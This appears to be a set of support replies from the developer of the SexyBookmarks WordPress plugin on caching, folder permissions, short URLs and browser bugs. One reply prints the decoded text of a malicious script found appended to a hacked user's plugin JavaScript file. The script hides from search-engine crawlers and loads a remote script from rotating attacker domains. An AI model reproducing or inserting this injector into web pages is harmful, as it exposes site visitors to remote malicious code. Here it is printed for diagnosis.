josh-jones

@simka:

As I mentioned above, that was only an assumption. I’m not a hacker, nor do I know much about hacking at all… I simply made an assumption based on the facts I saw, which was that those domains were being flaunted in the hack.

At any rate, it’s been far too long since this post was created so I can’t edit/remove my response.

To Anyone Recieving the Warning Messages:
We have removed the wp_footer and wp_head warnings as they were returning too many false positives. Please upgrade to v3.2.4.2 to alleviate that issue.

To Anyone Showing Bullets:
There are 3 primary possibilities causing this one:

1. Browser cache.

• Clear your cache
• Refresh twice (hard refresh)

• Custom sprite image/css deleted upon upgrade.

• Save your settings again in order to fetch the custom sprite image/css via the API

• Directory permissions.

• If NOT using BETA:

• Make sure your spritegen folder is CHMOD’d to either 755 or 777 based on your server setup

• If you ARE using BETA:

• Ensure the spritegen folder is CHMOD’d to either 755 or 777 based on server setup
• Ensure that spritegen->media is CHMOD’d to either 755 or 777 based on server setup
• Ensure that spritegen->api is CHMOD’d to either 755 or 777 based on server setup
• Ensure that spritegen->media->js is CHMOD’d to either 755 or 777 based on server setup

To Anyone Having Issues With Short URLs:
Please try selecting either TinyURL or b2l, as well as selecting the “Clear all short URLs” option and save your changes.

If the short URL problem persists, please let me know here: https://getsatisfaction.com/shareaholic/products/shareaholic_shareaholic_for_wordpress_sexybookmarks

@jeff & @intographics:

We’re relying on the function wp_footer() to be in the footer.php file of your theme in order to ensure that the JS inection happens AFTER the rest of the scripts have loaded into the page.

Please check your themes and ensure that your footer.php does in fact have <?php wp_footer(); ?> just BEFORE the </body> tag.

It works in wp3.0 for me…

You may need to CHMOD your “spritegen” folder to either 755 or 777 based on how your server is setup with the file user.

Wow, that’s a new one… WHITESPACE in QUERY is one I’ve never seen before and I’ve validated many a page with SexyBookmarks on it.

I’ll look into it.

Unfortunately, without a complete plugin rewrite there’s just no viable solution to make SexyBookmarks work for IE6…

However, we’re currently working on a major rewrite so you should definitely try to hold out until it’s finished.

@lajewl:

If the URL isn’t be shortened with ANY of the URL shortening services you’ve tried, then it’s most likely due to your server not have the necessary modules installed.

You’ll need either file_get_contents or cURL enabled on your server in order to fetch a short URL from the plugin.

The most reliable service to test with is normally TinyURL, so if your URLs aren’t working with it, then it’s most likely a server issue.

I agree, malware and spam is getting to be even more of a ridiculous nuisance now than it ever has been.

Also, just for your info… The garbled script that someone put into the public js file for sexybookmarks decoded into the following:

<script type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="watchtime="+escape("watchtime")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="https://'+e[g]+d[f]+'/data/mootools.js"><\/script>')};</script>

So I’m assuming the owners of:

edisonsnightclub.com,
gaindirectory.org,
ideacoreportal.com,
and
karenegren.com

are the perpetrators behind it.

@mutedgirl:

Indeed very curious. I can assure you that the plugin contains absolutely NO malware, spam, or anything else even remotely dangerous in it’s initial packaging…

However, after taking a look at your file… It does seem that you’ve been hacked. Take a look at the following file:
https://jayesel.net/wp-content/plugins/sexybookmarks/js/sexy-bookmarks-public.js

You’ll notice the long string of garbled JS at the beginning, followed by the normal JS which comes with the plugin. It looks as though someone has hacked your server and appended some JS to your public javascript file included with SB.

You can download the plugin again directly from wp.org and you’ll notice that the JS file does not include what you have in your JS file.

Glad you’re happy with it!

I’ve not updated the Technorati link as of yet because they are working on upgrading/changing the way they handle the “favorites” system.

According to their blog the changes should be complete soon, but even the second link you give does not work properly as they’ve not yet completed the upgrades.

Therefore, there’s no reason for me to change how the Technorati link is handled until they actually complete the changes as there may be more things that need to be changed as well.

However, once they’re finished I will make sure that the link is updated and working properly.

Technorati is collecting Favorites information as usual, however not currently displaying them in the site. We are working on an upgraded Favorites system we think you’ll like much better than the previous system. When we roll it out in the near future, all your previous favorite submissions will again be available to you. Thank you for your patience!

Well, the only thing I’ve found that fixes the issue in IE actually breaks it in the rest of the decent browsers.

$onclick = ' onclick="window.open(this.href, sharer, toolbar=0,status=0,width=626,height=436); return false;"';

Oh wow, nevermind man… I completely misunderstood what you were trying to say apparently. Let me look into it.

Hi egiethoorn,

Try replacing line #72 of html-helpers.php (in sexybookmarks) with the following line:

$onclick = ' onclick="window.open(this.href,\'sharer\',\'toolbar=0,status=0,width=626,height=436\'); return false;"';

It has not yet been developed to work on category pages… This is a feature which has been requested before and which we are considering for a future release, but it is not available yet.